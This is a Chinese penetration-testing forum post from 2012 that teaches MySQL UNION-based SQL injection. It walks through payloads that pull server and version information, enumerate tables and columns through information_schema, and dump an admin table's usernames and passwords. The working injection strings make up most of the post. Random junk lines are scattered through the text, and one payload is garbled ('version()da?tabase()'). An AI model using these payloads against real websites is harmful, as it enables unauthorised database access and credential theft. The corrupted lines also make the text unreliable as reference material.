中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
' P; \ R9 h h" ]* Q, T, T7 r6 `) N
8 `# w' D2 K. B5 {
学习盲注前先了解下 IFORMATION_SCHEMA 库
7 q5 M: z: g, P" t$ r# H
# ?1 v8 K" j* x1 _+ Y( J
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
- Y5 e- r$ v+ {# I5 K! v
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
. }* d9 U5 m: R1 C
1.得到所有数据库名:
7 r- u# w6 @* I" s9 }. B% P9 M
|SCHEMATA ->存储数据库名的表
! j" z, G2 V8 p5 d u! \
|---字段:SCHEMA_NAME ->数据库名称
/ i* T: N; o' P5 V1 b% b- J( }- _% {4 k
/ {0 h: c' Z. p. c9 e! u) @0 K
|TABLES ->存储表名
4 H1 V( J7 v6 ~0 g) \3 Y
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
4 T7 x b% u) J% A! m6 I
|---字段:TABLE_NAME ->存储表的表名
% _5 B0 {. A1 L: M" T1 x
5 ?, O5 E0 p# \
|COLUMNS ->存储的字段名表
# ~9 [+ L4 I/ j( r* K
|---字段:TABLE_SCHEMA ->该字段所属数据库名
! S8 [- W$ r3 `
|---字段:TABLE_NAME ->存储所属表的名称
: i6 F! |/ q3 }# ]7 A t
+ e$ _& Q. ~; q2 v$ G' r
|---字段:COLUMN_NAME ->该字段的名称
3 H( j4 S9 n7 i1 @8 m ]1 R7 \+ A$ o
6 ]- }9 _0 W) }8 o v
4 j/ O7 n* x: `, p( U
- C" f& p6 @6 d. q
###########################################################################
. W0 Q. }7 |. } C4 `$ W8 I/ X: B. z
6 p$ P& |' b( G( U3 Z/ O" i9 C5 k
0x001 获取系统信息:
1 O x6 y. A; o; o9 p& t
+ C) _& L3 m6 `/ x
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
9 U* ], E |: p6 d# a( x
0 z6 Z- k1 \6 i6 Q2 C- [! X
/*
2 p; r# Q" Q Y [1 I% P; L
/ ]) t: b; S" ^8 `' h3 s, k
@@global.version_compile_os 获取系统版本
0 f- X2 U* G2 _ h2 s) ?
2 m8 t% i7 }4 g- r1 p/ g7 S$ s
@@datadir 数据库路径
" B2 Y' e/ ]. ?) V* q
database() 当前数据库名称
R' w# J Y2 W. T
0x3c62723e 换行HEX值
9 O$ ]8 ~5 T1 L1 v4 H6 p
" p$ V( g4 `. t- m- \: [$ }* X
*/
2 e, q" t6 _& U. Z3 T& ^0 C
0 e- w5 R7 i7 x7 j" x+ e6 o5 a
1 x( P6 a9 `; Y2 h) A5 q
! v6 a, v% r! y( U4 {1 X: G
######################################################################
* n! w3 i+ r5 y i- O3 j
/ s- H" R3 J1 J9 b+ j
0x002 获取表名
* ]/ S# p" u4 x# c" m) ]
9 P5 @1 J5 c3 w; P$ l
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- C4 D" h; o, a- @0 `! ], _% H4 z/ ~
& E6 I' U/ [8 u! A% t0 }
6 f/ g/ E6 h% P# `
3 [! A) f n( e* T6 ~/ a8 C8 `5 o
/*
/ o7 p, e. w8 J( f( T( I
% W% F1 t5 [) Q( O- v4 b% E2 s
0x67617264656e 为当前数据库名
% c3 b8 v* U' K0 R9 l1 Q
; T+ Z! v( R3 \9 U1 ?3 n
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
, B* o1 M f7 l
$ @4 j; v: P8 {+ U4 S3 \
*/
$ u2 p9 G/ F1 \
4 _0 K- U8 K h, Q5 y3 f
######################################################################
1 w: ~4 s0 {2 J4 I+ @
# ^3 O/ [# @" E% ^$ h/ I
. E4 }8 b+ w! U/ ~* P
N- {+ ]" K$ [ s/ }4 R( O( K
0x003 获取字段
6 _3 s4 j" v+ w7 U# A- P g
7 D+ R: T$ f, v3 r; k
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
* p/ v: t) b& u
2 Y$ e) x1 }7 p5 M: Q
/*
- e$ l) A' A4 t ^/ }5 c" J& B
" F3 n2 J% G. \5 C: T. W
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
& c/ j" O( ` y( N4 N
9 b# t7 [; b% @
0x61646d696e ->选择一个表
# d. D! f+ V- c/ h0 O8 B
4 I* t* f5 n2 R7 O* w
0x67617264656e ->数据库名
0 ~' [/ z* @" k3 J( d3 A
: ~, v M" y3 d4 [) Y; N
*/
* D7 @1 ~& R$ Y3 U. G1 U/ z
& i" `/ R0 h3 H
#####################################################################
. _4 r N8 d! h9 _
0 K. V6 [2 w% t6 V' O
9 A0 W* n( \- e7 y
; ~- a4 `+ `" i, u0 |
0x004 获取数据
" W# I4 C8 u6 K7 I
/ ~/ N; K, N6 {( R3 W& ]2 Q/ X
union select 1,2,3
7 v2 F& Q, H( I
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
6 `* w7 p3 y' i
( J+ N0 I; }$ u0 n4 V P% s0 Q+ M. l
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
4 v( H5 S9 n6 B
$ k: E( O9 r2 }7 t# c
* i! u b* u+ a0 a1 S! n& E
5 U% s! M( M' {6 P7 v$ P$ S
/*
6 [" x" |7 ^3 B
0 z( J+ ^3 J7 L- X! B; C
0x3c62723e 换行符号HEX编码
8 \1 @: a) T# Z) x0 `: N
o% r2 Z3 a/ V
group_concat 同时获得该字段所有数据
) P/ m. ^ {: y
5 T! B k* J% u) t
*/
+ D' R- B3 `9 v
. B9 \3 m/ Q, V. E- T0 B( v6 ^* x# n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2